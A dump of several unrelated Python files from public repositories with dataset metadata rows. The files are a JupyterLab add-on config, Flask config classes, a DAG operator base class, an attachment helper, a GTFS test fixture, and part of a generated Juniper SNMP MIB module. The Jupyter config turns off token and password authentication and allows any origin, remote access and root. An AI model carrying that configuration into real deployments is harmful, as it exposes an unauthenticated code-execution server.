| 42.5 | 103 | 0.473126 | 526 | 4,335 | 3.891635 | 0.574144 | 0.029311 | 0.043967 | 0.016121 | 0.053249 | 0.045921 | 0 | 0 | 0 | 0 | 0 | 0.110977 | 0.235063 | 4,335 | 101 | 104 | 42.920792 | 0.506333 | 0.459746 | 0 | 0.084746 | 0 | 0.305085 | 0.552828 | 0.378781 | 0 | 0 | 0.004384 | 0 | 0 | 0 | null | null | 0.033898 | 0.067797 | null | null | 0.169492 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
cd93571ddd3f2aef88974838f9012f1f21d85a0a | 1,005 | py | Python | jupyterlab/rootfs/etc/jupyter/jupyter_notebook_config.py | kuchel77/addon-jupyterlab-lite | e764df206838211dc61166b8c58f755bc069c9ad | [
"MIT"
] | null | null | null | jupyterlab/rootfs/etc/jupyter/jupyter_notebook_config.py | kuchel77/addon-jupyterlab-lite | e764df206838211dc61166b8c58f755bc069c9ad | [
"MIT"
] | null | null | null | jupyterlab/rootfs/etc/jupyter/jupyter_notebook_config.py | kuchel77/addon-jupyterlab-lite | e764df206838211dc61166b8c58f755bc069c9ad | [
"MIT"
] | 1 | 2020-09-01T12:52:34.000Z | 2020-09-01T12:52:34.000Z | # Configuration file for ipython-notebook.
c = get_config()
# ------------------------------------------------------------------------------
# NotebookApp configuration
# ------------------------------------------------------------------------------
c.GitHubConfig.access_token = ''
c.JupyterApp.answer_yes = True
c.LabApp.user_settings_dir = '/data/user-settings'
c.LabApp.workspaces_dir = '/data/workspaces'
c.NotebookApp.allow_origin = '*'
c.NotebookApp.allow_password_change = False
c.NotebookApp.allow_remote_access = True
c.NotebookApp.allow_root = True
c.NotebookApp.base_url = '/'
c.NotebookApp.ip = '127.0.0.1'
c.NotebookApp.notebook_dir = '/config/notebooks'
c.NotebookApp.open_browser = False
c.NotebookApp.password = ''
c.NotebookApp.port = 28459
c.NotebookApp.token = ''
c.NotebookApp.trust_xheaders = True
c.NotebookApp.tornado_settings = {
    'static_url_prefix': '/static/',
    'headers': {
        'Content-Security-Policy': "frame-ancestors *"
    }
}
| 32.419355 | 80 | 0.631841 | 109 | 1,005 | 5.642202 | 0.46789 | 0.273171 | 0.110569 | 0.087805 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.012101 | 0.095522 | 1,005 | 30 | 81 | 33.5 | 0.664466 | 0.222886 | 0 | 0 | 0 | 0 | 0.173969 | 0.029639 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.086957 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 2 |
2697eb8543d184a4917850ada01be10ee520ca14 | 1,050 | py | Python | instance/config.py | imsplitbit/usermanager | fed3b3c049df1257becfe9ba4cda97a509bba0ec | [
"MIT"
] | null | null | null | instance/config.py | imsplitbit/usermanager | fed3b3c049df1257becfe9ba4cda97a509bba0ec | [
"MIT"
] | null | null | null | instance/config.py | imsplitbit/usermanager | fed3b3c049df1257becfe9ba4cda97a509bba0ec | [
"MIT"
] | null | null | null | import os
class Config(object):
    """
    Parent configuration class
    """
    DEBUG = False
    CSRF_ENABLED = True
    SECRET = os.getenv('SECRET')
    SQLALCHEMY_DATABASE_URI = os.getenv('DATABASE_URL')


class DevelopmentConfig(Config):
    """
    Configuration for Dev
    """
    DEBUG = True
    SQLALCHEMY_DATABASE_URI = 'sqlite:////tmp/.usrmgrdev.db'


class TestingConfig(Config):
    """
    Configuration for testing, with a different db
    """
    TESTING = True
    SQLALCHEMY_DATABASE_URI = 'sqlite:////tmp/.usrmgrtest.db'
    DEBUG = True


class StagingConfig(Config):
    """
    Staging configuration
    """
    DEBUG = True
    SQLALCHEMY_DATABASE_URI = 'sqlite:////tmp/.usrmgrstaging.db'


class ProductionConfig(Config):
    """
    Production configuration
    """
    DEBUG = False
    TESTING = False
    SQLALCHEMY_DATABASE_URI = 'sqlite:////tmp/.usrmgrprod.db'


app_config = {
    'development': DevelopmentConfig,
    'testing': TestingConfig,
    'staging': StagingConfig,
    'production': ProductionConfig,
}
| 19.444444 | 64 | 0.651429 | 100 | 1,050 | 6.71 | 0.39 | 0.134128 | 0.156483 | 0.160954 | 0.211624 | 0.166915 | 0.116244 | 0 | 0 | 0 | 0 | 0 | 0.225714 | 1,050 | 53 | 65 | 19.811321 | 0.825338 | 0.135238 | 0 | 0.192308 | 0 | 0 | 0.205529 | 0.141827 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.038462 | 0 | 0.769231 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
26a02fe66b8303fda126f3d53067be58fe0ee66d | 3,019 | py | Python | deepcvr/data/operator.py | john-james-ai/DeepCVR | d8c2f98ee4febf7b0a7131d1cf198cee02fcdb2e | [
"BSD-3-Clause"
] | null | null | null | deepcvr/data/operator.py | john-james-ai/DeepCVR | d8c2f98ee4febf7b0a7131d1cf198cee02fcdb2e | [
"BSD-3-Clause"
] | null | null | null | deepcvr/data/operator.py | john-james-ai/DeepCVR | d8c2f98ee4febf7b0a7131d1cf198cee02fcdb2e | [
"BSD-3-Clause"
] | null | null | null | #!/usr/bin/env python3
# -*- coding:utf-8 -*-
# ================================================================================================ #
# Project : DeepCVR: Deep Learning for Conversion Rate Prediction #
# Version : 0.1.0 #
# File : /core.py #
# Language : Python 3.8.12 #
# ------------------------------------------------------------------------------------------------ #
# Author : John James #
# Email : john.james.ai.studio@gmail.com #
# URL : https://github.com/john-james-ai/cvr #
# ------------------------------------------------------------------------------------------------ #
# Created : Tuesday, March 8th 2022, 8:48:19 pm #
# Modified : Thursday, March 31st 2022, 1:08:51 am #
# Modifier : John James (john.james.ai.studio@gmail.com) #
# ------------------------------------------------------------------------------------------------ #
# License : BSD 3-clause "New" or "Revised" License #
# Copyright: (c) 2022 Bryant St. Labs #
# ================================================================================================ #
"""Defines the interfaces for classes involved in the construction and implementation of DAGS."""
from abc import ABC, abstractmethod
import pandas as pd
from typing import Any
# ------------------------------------------------------------------------------------------------ #
class Operator(ABC):
    """Abstract class for operator classes

    Args:
        task_id (int): A number, typically used to indicate the sequence of the task within a DAG
        task_name (str): String name
        params (Any): Parameters for the task
    """

    def __init__(self, task_id: int, task_name: str, params: list) -> None:
        self._task_id = task_id
        self._task_name = task_name
        self._params = params

    def __str__(self) -> str:
        return str(
            "Task id: {}\tTask name: {}\tParams: {}".format(
                self._task_id, self._task_name, self._params
            )
        )

    @property
    def task_id(self) -> int:
        return self._task_id

    @property
    def task_name(self) -> str:
        return self._task_name

    @property
    def params(self) -> Any:
        return self._params

    @abstractmethod
    def execute(self, data: pd.DataFrame = None, context: dict = None) -> Any:
        pass
| 45.742424 | 100 | 0.358397 | 235 | 3,019 | 4.47234 | 0.510638 | 0.045671 | 0.038059 | 0.03235 | 0.081827 | 0.047574 | 0 | 0 | 0 | 0 | 0 | 0.018717 | 0.38059 | 3,019 | 65 | 101 | 46.446154 | 0.543316 | 0.698576 | 0 | 0.115385 | 0 | 0 | 0.045292 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.230769 | false | 0.038462 | 0.115385 | 0.153846 | 0.538462 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 2 |
26b05d0468e1ce34d5f5ce4a0d7aa6143f0f46e1 | 1,165 | py | Python | centralpy/responses/attachment_listing.py | pmaengineering/centralpy | edd89925bcc4204add1bf93b7ff3437cc0e6ea92 | [
"MIT"
] | null | null | null | centralpy/responses/attachment_listing.py | pmaengineering/centralpy | edd89925bcc4204add1bf93b7ff3437cc0e6ea92 | [
"MIT"
] | 1 | 2022-01-22T14:36:57.000Z | 2022-01-24T07:19:44.000Z | centralpy/responses/attachment_listing.py | pmaengineering/centralpy | edd89925bcc4204add1bf93b7ff3437cc0e6ea92 | [
"MIT"
] | 1 | 2021-06-30T13:45:09.000Z | 2021-06-30T13:45:09.000Z | """A module for the AttachmentListing class."""
from typing import List
from requests.models import Response
class AttachmentListing:
    """A class to represent an attachments listing."""

    def __init__(self, response: Response):
        self.response = response

    def has_attachment(self, filename: str) -> bool:
        """Check if the attachment listing has the filename."""
        return any(filename == item["name"] for item in self.get_attachments())

    def get_attachments(self) -> list:
        """Return the list of attachments."""
        return self.response.json()

    def get_attachment_filenames(self) -> List[str]:
        """Return a list of all attachment filenames."""
        return [item["name"] for item in self.get_attachments()]

    def print_all(self) -> None:
        """Print all attachments."""
        attachments = self.get_attachments()
        if not attachments:
            print("-> No attachments found")
        else:
            for item in attachments:
                print(f'-> name: "{item["name"]}", exists: {item["exists"]}')

    def __repr__(self):
        return f"AttachmentListing({self.response!r})"
| 32.361111 | 79 | 0.630901 | 136 | 1,165 | 5.286765 | 0.352941 | 0.066759 | 0.037552 | 0.041725 | 0.105702 | 0.105702 | 0.105702 | 0.105702 | 0.105702 | 0 | 0 | 0 | 0.243777 | 1,165 | 35 | 80 | 33.285714 | 0.816118 | 0.201717 | 0 | 0 | 0 | 0 | 0.131257 | 0.040044 | 0 | 0 | 0 | 0 | 0 | 1 | 0.3 | false | 0 | 0.1 | 0.05 | 0.65 | 0.15 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
26b0869d667ae5f86081d97cacbdab9265068d3d | 436 | py | Python | test/base.py | nathanhilbert/pygtfs_atx | ab620ba730f9dbe96bcc904aca8dfa9a70d77412 | [
"MIT"
] | null | null | null | test/base.py | nathanhilbert/pygtfs_atx | ab620ba730f9dbe96bcc904aca8dfa9a70d77412 | [
"MIT"
] | 7 | 2016-02-24T15:08:51.000Z | 2016-02-25T14:58:24.000Z | test/base.py | nathanhilbert/pygtfs_atx | ab620ba730f9dbe96bcc904aca8dfa9a70d77412 | [
"MIT"
] | null | null | null | from pygtfs import Schedule
from pygtfs import append_feed, delete_feed, overwrite_feed, list_feeds
class GTFSSmallSetup(object):
    def __init__(self):
        self.schedule = Schedule(":memory:")
        append_feed(self.schedule, "test/data/atx_small")


# class GTFSATXSetup(object):
#     def __init__(self):
#         self.schedule = Schedule(":memory:")
# append_feed(self.schedule, "test/data/atx_small" ) | 33.538462 | 72 | 0.678899 | 51 | 436 | 5.490196 | 0.431373 | 0.171429 | 0.114286 | 0.121429 | 0.578571 | 0.578571 | 0.578571 | 0.578571 | 0.578571 | 0.578571 | 0 | 0 | 0.204128 | 436 | 13 | 73 | 33.538462 | 0.806916 | 0.355505 | 0 | 0 | 0 | 0 | 0.101887 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.166667 | false | 0 | 0.333333 | 0 | 0.666667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 2 |
26b2a19eddfdb3a10685a4136d20812f47f2c278 | 41,729 | py | Python | pysnmp/JUNIPER-WX-MIB.py | agustinhenze/mibs.snmplabs.com | 1fc5c07860542b89212f4c8ab807057d9a9206c7 | [
"Apache-2.0"
] | 11 | 2021-02-02T16:27:16.000Z | 2021-08-31T06:22:49.000Z | pysnmp/JUNIPER-WX-MIB.py | agustinhenze/mibs.snmplabs.com | 1fc5c07860542b89212f4c8ab807057d9a9206c7 | [
"Apache-2.0"
] | 75 | 2021-02-24T17:30:31.000Z | 2021-12-08T00:01:18.000Z | pysnmp/JUNIPER-WX-MIB.py | agustinhenze/mibs.snmplabs.com | 1fc5c07860542b89212f4c8ab807057d9a9206c7 | [
"Apache-2.0"
] | 10 | 2019-04-30T05:51:36.000Z | 2022-02-16T03:33:41.000Z | #
# PySNMP MIB module JUNIPER-WX-MIB (http://snmplabs.com/pysmi)
# ASN.1 source file:///Users/davwang4/Dev/mibs.snmplabs.com/asn1/JUNIPER-WX-GLOBAL-REG
# Produced by pysmi-0.3.4 at Mon Apr 29 19:50:41 2019
# On host DAVWANG4-M-1475 platform Darwin version 18.5.0 by user davwang4
# Using Python version 3.7.3 (default, Mar 27 2019, 09:23:15)
#
OctetString, ObjectIdentifier, Integer = mibBuilder.importSymbols("ASN1", "OctetString", "ObjectIdentifier", "Integer")
NamedValues, = mibBuilder.importSymbols("ASN1-ENUMERATION", "NamedValues")
SingleValueConstraint, ValueRangeConstraint, ConstraintsUnion, ConstraintsIntersection, ValueSizeConstraint = mibBuilder.importSymbols("ASN1-REFINEMENT", "SingleValueConstraint", "ValueRangeConstraint", "ConstraintsUnion", "ConstraintsIntersection", "ValueSizeConstraint")
jnxWxCommonEventDescr, = mibBuilder.importSymbols("JUNIPER-WX-COMMON-MIB", "jnxWxCommonEventDescr")
jnxWxSpecificMib, jnxWxModules = mibBuilder.importSymbols("JUNIPER-WX-GLOBAL-REG", "jnxWxSpecificMib", "jnxWxModules")
TcQosIdentifier, TcAppName = mibBuilder.importSymbols("JUNIPER-WX-GLOBAL-TC", "TcQosIdentifier", "TcAppName")
ModuleCompliance, NotificationGroup = mibBuilder.importSymbols("SNMPv2-CONF", "ModuleCompliance", "NotificationGroup")
MibScalar, MibTable, MibTableRow, MibTableColumn, iso, ModuleIdentity, TimeTicks, MibIdentifier, ObjectIdentity, Gauge32, IpAddress, Counter32, Bits, Integer32, NotificationType, Counter64, Unsigned32 = mibBuilder.importSymbols("SNMPv2-SMI", "MibScalar", "MibTable", "MibTableRow", "MibTableColumn", "iso", "ModuleIdentity", "TimeTicks", "MibIdentifier", "ObjectIdentity", "Gauge32", "IpAddress", "Counter32", "Bits", "Integer32", "NotificationType", "Counter64", "Unsigned32")
TextualConvention, TimeStamp, DisplayString = mibBuilder.importSymbols("SNMPv2-TC", "TextualConvention", "TimeStamp", "DisplayString")
jnxWxMibModule = ModuleIdentity((1, 3, 6, 1, 4, 1, 8239, 1, 1, 4))
jnxWxMibModule.setRevisions(('2004-05-24 00:00', '2003-06-23 00:00', '2002-03-28 00:00', '2002-03-27 00:00', '2001-12-19 12:00',))
if mibBuilder.loadTexts: jnxWxMibModule.setLastUpdated('200203280000Z')
if mibBuilder.loadTexts: jnxWxMibModule.setOrganization('Juniper Networks, Inc')
jnxWxMib = ObjectIdentity((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1))
if mibBuilder.loadTexts: jnxWxMib.setStatus('current')
jnxWxConfMib = ObjectIdentity((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 1))
if mibBuilder.loadTexts: jnxWxConfMib.setStatus('current')
jnxWxObjs = ObjectIdentity((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2))
if mibBuilder.loadTexts: jnxWxObjs.setStatus('current')
jnxWxEvents = ObjectIdentity((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 3))
if mibBuilder.loadTexts: jnxWxEvents.setStatus('current')
jnxWxStatsUpdateTime = MibScalar((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 1), TimeStamp()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxWxStatsUpdateTime.setStatus('current')
jnxWxStatsAsmCount = MibScalar((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 2), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxWxStatsAsmCount.setStatus('current')
jnxWxStatsVirtEndptCount = MibScalar((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 9), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxWxStatsVirtEndptCount.setStatus('current')
jnxWxStatsAppCount = MibScalar((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 3), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxWxStatsAppCount.setStatus('current')
jnxWxStatsAccelAppCount = MibScalar((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 8), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxWxStatsAccelAppCount.setStatus('current')
jnxWxStatsQosClassCount = MibScalar((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 11), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxWxStatsQosClassCount.setStatus('current')
jnxWxStatsQosEndptCount = MibScalar((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 12), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxWxStatsQosEndptCount.setStatus('current')
jnxWxStatsWpEndptCount = MibScalar((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 13), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxWxStatsWpEndptCount.setStatus('current')
jnxWxSysStats = ObjectIdentity((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 4))
if mibBuilder.loadTexts: jnxWxSysStats.setStatus('current')
jnxWxSysStatsBytesInAe = MibScalar((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 4, 1), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxWxSysStatsBytesInAe.setStatus('current')
jnxWxSysStatsBytesOutAe = MibScalar((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 4, 2), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxWxSysStatsBytesOutAe.setStatus('current')
jnxWxSysStatsPktsInAe = MibScalar((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 4, 3), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxWxSysStatsPktsInAe.setStatus('current')
jnxWxSysStatsPktsOutAe = MibScalar((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 4, 4), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxWxSysStatsPktsOutAe.setStatus('current')
jnxWxSysStatsBytesOutOob = MibScalar((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 4, 5), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxWxSysStatsBytesOutOob.setStatus('current')
jnxWxSysStatsBytesPtNoAe = MibScalar((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 4, 6), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxWxSysStatsBytesPtNoAe.setStatus('current')
jnxWxSysStatsPktsPtNoAe = MibScalar((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 4, 7), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxWxSysStatsPktsPtNoAe.setStatus('current')
jnxWxSysStatsBytesPtFilter = MibScalar((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 4, 8), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxWxSysStatsBytesPtFilter.setStatus('current')
jnxWxSysStatsPktsPtFilter = MibScalar((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 4, 9), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxWxSysStatsPktsPtFilter.setStatus('current')
jnxWxSysStatsBytesOfPt = MibScalar((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 4, 10), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxWxSysStatsBytesOfPt.setStatus('current')
jnxWxSysStatsPktsOfPt = MibScalar((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 4, 11), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxWxSysStatsPktsOfPt.setStatus('current')
jnxWxSysStatsBytesTpIn = MibScalar((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 4, 12), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxWxSysStatsBytesTpIn.setStatus('current')
jnxWxSysStatsPktsTpIn = MibScalar((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 4, 13), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxWxSysStatsPktsTpIn.setStatus('current')
jnxWxSysStatsBytesTpOut = MibScalar((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 4, 14), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxWxSysStatsBytesTpOut.setStatus('current')
jnxWxSysStatsPktsTpOut = MibScalar((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 4, 15), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxWxSysStatsPktsTpOut.setStatus('current')
jnxWxSysStatsBytesTpPt = MibScalar((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 4, 16), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxWxSysStatsBytesTpPt.setStatus('current')
jnxWxSysStatsPktsTpPt = MibScalar((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 4, 17), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxWxSysStatsPktsTpPt.setStatus('current')
jnxWxSysStatsPeakRdn = MibScalar((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 4, 18), Unsigned32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxWxSysStatsPeakRdn.setStatus('current')
jnxWxSysStatsThruputIn = MibScalar((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 4, 19), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxWxSysStatsThruputIn.setStatus('current')
jnxWxSysStatsThruputOut = MibScalar((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 4, 20), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxWxSysStatsThruputOut.setStatus('current')
jnxWxSysStatsBytesInRe = MibScalar((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 4, 21), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxWxSysStatsBytesInRe.setStatus('current')
jnxWxSysStatsBytesOutRe = MibScalar((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 4, 22), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxWxSysStatsBytesOutRe.setStatus('current')
jnxWxSysStatsPktsInRe = MibScalar((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 4, 23), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxWxSysStatsPktsInRe.setStatus('current')
jnxWxSysStatsPktsOutRe = MibScalar((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 4, 24), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxWxSysStatsPktsOutRe.setStatus('current')
jnxWxSysStatsPktSizeIn1 = MibScalar((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 4, 25), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxWxSysStatsPktSizeIn1.setStatus('current')
jnxWxSysStatsPktSizeIn2 = MibScalar((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 4, 26), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxWxSysStatsPktSizeIn2.setStatus('current')
jnxWxSysStatsPktSizeIn3 = MibScalar((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 4, 27), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxWxSysStatsPktSizeIn3.setStatus('current')
jnxWxSysStatsPktSizeIn4 = MibScalar((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 4, 28), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxWxSysStatsPktSizeIn4.setStatus('current')
jnxWxSysStatsPktSizeIn5 = MibScalar((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 4, 29), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxWxSysStatsPktSizeIn5.setStatus('current')
jnxWxSysStatsPktSizeIn6 = MibScalar((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 4, 30), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxWxSysStatsPktSizeIn6.setStatus('current')
jnxWxSysStatsPktSizeOut1 = MibScalar((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 4, 31), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxWxSysStatsPktSizeOut1.setStatus('current')
jnxWxSysStatsPktSizeOut2 = MibScalar((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 4, 32), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxWxSysStatsPktSizeOut2.setStatus('current')
jnxWxSysStatsPktSizeOut3 = MibScalar((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 4, 33), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxWxSysStatsPktSizeOut3.setStatus('current')
jnxWxSysStatsPktSizeOut4 = MibScalar((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 4, 34), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxWxSysStatsPktSizeOut4.setStatus('current')
jnxWxSysStatsPktSizeOut5 = MibScalar((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 4, 35), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxWxSysStatsPktSizeOut5.setStatus('current')
jnxWxSysStatsPktSizeOut6 = MibScalar((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 4, 36), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxWxSysStatsPktSizeOut6.setStatus('current')
jnxWxAsm = ObjectIdentity((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 5))
if mibBuilder.loadTexts: jnxWxAsm.setStatus('current')
jnxWxAsmTable = MibTable((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 5, 1), )
if mibBuilder.loadTexts: jnxWxAsmTable.setStatus('current')
jnxWxAsmEntry = MibTableRow((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 5, 1, 1), ).setIndexNames((0, "JUNIPER-WX-MIB", "jnxWxAsmIndex"))
if mibBuilder.loadTexts: jnxWxAsmEntry.setStatus('current')
jnxWxAsmIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 5, 1, 1, 1), Integer32())
if mibBuilder.loadTexts: jnxWxAsmIndex.setStatus('current')
jnxWxAsmIpAddress = MibTableColumn((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 5, 1, 1, 2), IpAddress()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxWxAsmIpAddress.setStatus('current')
jnxWxAsmStatsTable = MibTable((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 5, 2), )
if mibBuilder.loadTexts: jnxWxAsmStatsTable.setStatus('current')
jnxWxAsmStatsEntry = MibTableRow((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 5, 2, 1), )
jnxWxAsmEntry.registerAugmentions(("JUNIPER-WX-MIB", "jnxWxAsmStatsEntry"))
jnxWxAsmStatsEntry.setIndexNames(*jnxWxAsmEntry.getIndexNames())
if mibBuilder.loadTexts: jnxWxAsmStatsEntry.setStatus('current')
jnxWxAsmStatsPktsIn = MibTableColumn((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 5, 2, 1, 1), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxWxAsmStatsPktsIn.setStatus('current')
jnxWxAsmStatsPktsOut = MibTableColumn((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 5, 2, 1, 2), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxWxAsmStatsPktsOut.setStatus('current')
jnxWxAsmStatsBytesIn = MibTableColumn((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 5, 2, 1, 3), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxWxAsmStatsBytesIn.setStatus('current')
jnxWxAsmStatsBytesOut = MibTableColumn((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 5, 2, 1, 4), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxWxAsmStatsBytesOut.setStatus('current')
